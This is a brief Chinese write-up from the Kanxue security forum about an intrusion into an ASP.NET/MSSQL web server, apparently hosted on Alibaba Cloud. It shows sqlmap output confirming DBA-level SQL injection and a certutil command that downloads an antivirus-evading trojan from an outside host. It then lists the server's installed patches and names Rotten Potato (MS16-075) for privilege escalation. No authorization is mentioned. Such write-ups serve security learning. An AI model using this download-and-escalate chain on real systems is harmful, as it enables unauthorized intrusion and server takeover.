本文为看雪论坛优秀文章
看雪论坛作者ID:毅种循环
信息收集
打 点
[19:24:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2014
[19:24:36] [INFO] testing if current user is DBA
current user is DBA: True
然后我就用了一种比较麻烦的方法,先把免杀马传上去再执行,用的是certutil方法。
certutil.exe -urlcache -split -f http://1.1.1.1/1.exe C:\Users\Public\1.exe
command standard output:
---
**** 联机 ****
000000 ...
047a7d
CertUtil: -URLCache 失败: 0x80070005 (WIN32: 5)
CertUtil: 拒绝访问。
command standard output:
---
**** 联机 ****
000000 ...
047a7d
CertUtil: -URLCache 命令成功完成。
---
后渗透
阿里云的服务器,安装67个补丁
修补程序: 安装了 67 个修补程序。
[01]: KB981391
[02]: KB981392
[03]: KB977236
[04]: KB981111
[05]: KB977238
[06]: KB2849697
[07]: KB2849696
[08]: KB2841134
[09]: KB2841134
[10]: KB977239
[11]: KB2670838
[12]: KB2830477
[13]: KB2592687
[14]: KB3191566
[15]: KB981390
[16]: KB2386667
[17]: KB2545698
[18]: KB2547666
[19]: KB2574819
[20]: KB2603229
[21]: KB2639308
[22]: KB2667402
[23]: KB2685811
[24]: KB2685813
[25]: KB2698365
[26]: KB2729094
[27]: KB2732059
[28]: KB2750841
[29]: KB2761217
[30]: KB2809215
[31]: KB2834140
[32]: KB2862330
[33]: KB2894844
[34]: KB2900986
[35]: KB2919469
[36]: KB2923545
[37]: KB2970228
[38]: KB2984972
[39]: KB3004375
[40]: KB3006137
[41]: KB3020369
[42]: KB3020388
[43]: KB3046269
[44]: KB3054205
[45]: KB3059317
[46]: KB3068708
[47]: KB3075226
[48]: KB3080149
[49]: KB3102429
[50]: KB3118401
[51]: KB3125574
[52]: KB3138612
[53]: KB3140245
[54]: KB3156016
[55]: KB3156019
[56]: KB3159398
[57]: KB3161949
[58]: KB3161958
[59]: KB3172605
[60]: KB3177467
[61]: KB3179573
[62]: KB3181988
[63]: KB3210131
[64]: KB4019990
[65]: KB4040980
[66]: KB976902
[67]: KB4038777
用烂土豆 MS16-075提权就行了,一把梭感觉美滋滋。
还是个8G内存的服务器,不存在域环境。
看一下用户,好决定后面怎么行动。
反 思
看雪ID:毅种循环
https://bbs.pediy.com/user-home-731531.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!